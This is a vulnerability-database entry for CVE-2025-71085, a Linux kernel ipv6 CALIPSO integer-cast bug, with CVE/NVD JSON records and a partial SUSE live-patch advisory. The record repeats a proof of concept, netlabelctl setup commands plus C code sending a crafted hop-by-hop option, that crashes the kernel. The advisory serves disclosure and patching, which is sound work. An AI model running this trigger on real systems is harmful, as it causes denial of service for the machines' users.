Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-71085 (GCVE-0-2025-71085)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-05-11 21:54
VLAI
EPSS
Title
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using `netlabelctl` tool:
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;
// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;
// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0);
Severity
No CVSS data available.
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 86f365897068d09418488165a68b23cb5baa37f2
(git)
Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 6b7522424529556c9cbc15e15e7bd4eeae310910 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 2bb759062efa188ea5d07242a43e5aa5464bbae1 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < c53aa6a5086f03f19564096ee084a202a8c738c0 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < bf3709738d8a8cc6fa275773170c5c29511a0b24 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 73744ad5696dce0e0f43872aba8de6a83d6ad570 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 58fc7342b529803d3c221101102fe913df7adb83 (git) |
|
| Linux | Linux |
Affected:
4.8
Unaffected: 0 , < 4.8 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.4 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "86f365897068d09418488165a68b23cb5baa37f2",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "6b7522424529556c9cbc15e15e7bd4eeae310910",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "58fc7342b529803d3c221101102fe913df7adb83",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T21:54:27.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
},
{
"url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
},
{
"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
},
{
"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
},
{
"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
},
{
"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
},
{
"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
}
],
"title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71085",
"datePublished": "2026-01-13T15:34:48.324Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-05-11T21:54:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-71085",
"date": "2026-05-27",
"epss": "0.00033",
"percentile": "0.09872"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-71085\",\"sourceIdentifier\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"published\":\"2026-01-13T16:16:08.117\",\"lastModified\":\"2026-03-25T18:57:30.837\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In the Linux kernel, the following vulnerability has been resolved:\\n\\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\\n\\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\\nnet/core/skbuff.c:2232 in pskb_expand_head().\\nThis bug is triggered as part of the calipso_skbuff_setattr()\\nroutine when skb_cow() is passed headroom \u003e INT_MAX\\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\\n\\nThe root cause of the bug is due to an implicit integer cast in\\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\\nbecomes negative, and pskb_expand_head() is passed a negative value for\\nnhead.\\n\\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\\n\\\"negative\\\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\\nby only using skb_cow() to grow headroom.\\n\\nPoC:\\n\\tUsing `netlabelctl` tool:\\n\\n netlabelctl map del default\\n netlabelctl calipso add pass doi:7\\n netlabelctl map add default address:0::1/128 protocol:calipso,7\\n\\n Then run the following PoC:\\n\\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\\n\\n // setup msghdr\\n int cmsg_size = 2;\\n int cmsg_len = 0x60;\\n struct msghdr msg;\\n struct sockaddr_in6 dest_addr;\\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\\n sizeof(struct cmsghdr) + cmsg_len);\\n msg.msg_name = \u0026dest_addr;\\n msg.msg_namelen = sizeof(dest_addr);\\n msg.msg_iov = NULL;\\n msg.msg_iovlen = 0;\\n msg.msg_control = cmsg;\\n msg.msg_controllen = cmsg_len;\\n msg.msg_flags = 0;\\n\\n // setup sockaddr\\n dest_addr.sin6_family = AF_INET6;\\n dest_addr.sin6_port = htons(31337);\\n dest_addr.sin6_flowinfo = htonl(31337);\\n dest_addr.sin6_addr = in6addr_loopback;\\n dest_addr.sin6_scope_id = 31337;\\n\\n // setup cmsghdr\\n cmsg-\u003ecmsg_len = cmsg_len;\\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\\n\\n sendmsg(fd, \u0026msg, 0);\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-617\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.8.1\",\"versionEndExcluding\":\"5.10.248\",\"matchCriteriaId\":\"C178EEDC-1906-4F84-B618-31B9B5CA4130\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.11\",\"versionEndExcluding\":\"5.15.198\",\"matchCriteriaId\":\"82159CAA-B6BA-43C6-85D8-65BDBC175A7E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.16\",\"versionEndExcluding\":\"6.1.160\",\"matchCriteriaId\":\"C10CC03E-16A9-428A-B449-40D3763E15F6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.2\",\"versionEndExcluding\":\"6.6.120\",\"matchCriteriaId\":\"43C3A206-5EEE-417B-AA0F-EF8972E7A9F0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.7\",\"versionEndExcluding\":\"6.12.64\",\"matchCriteriaId\":\"32BF4A52-377C-44ED-B5E6-7EA5D896E98B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.13\",\"versionEndExcluding\":\"6.18.4\",\"matchCriteriaId\":\"DC988EA0-0E32-457A-BF95-89BEB31A227B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F396E56-2772-41B8-917F-0C38C2C1641C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"F71D92C0-C023-48BD-B3B6-70B638EEE298\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"13580667-0A98-40CC-B29F-D12790B91BDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB5B7DFC-C36B-45D8-922C-877569FDDF43\"}]}]}],\"references\":[{\"url\":\"https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]}]}}"
}
}
SUSE-SU-2026:1000-1
Vulnerability from csaf_suse - Published: 2026-03-25 07:08 - Updated: 2026-03-25 07:08Summary
Security update for the Linux Kernel (Live Patch 24 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 24 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.97 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1000,SUSE-2026-999,SUSE-SLE-Module-Live-Patching-15-SP5-2026-999
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
59 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
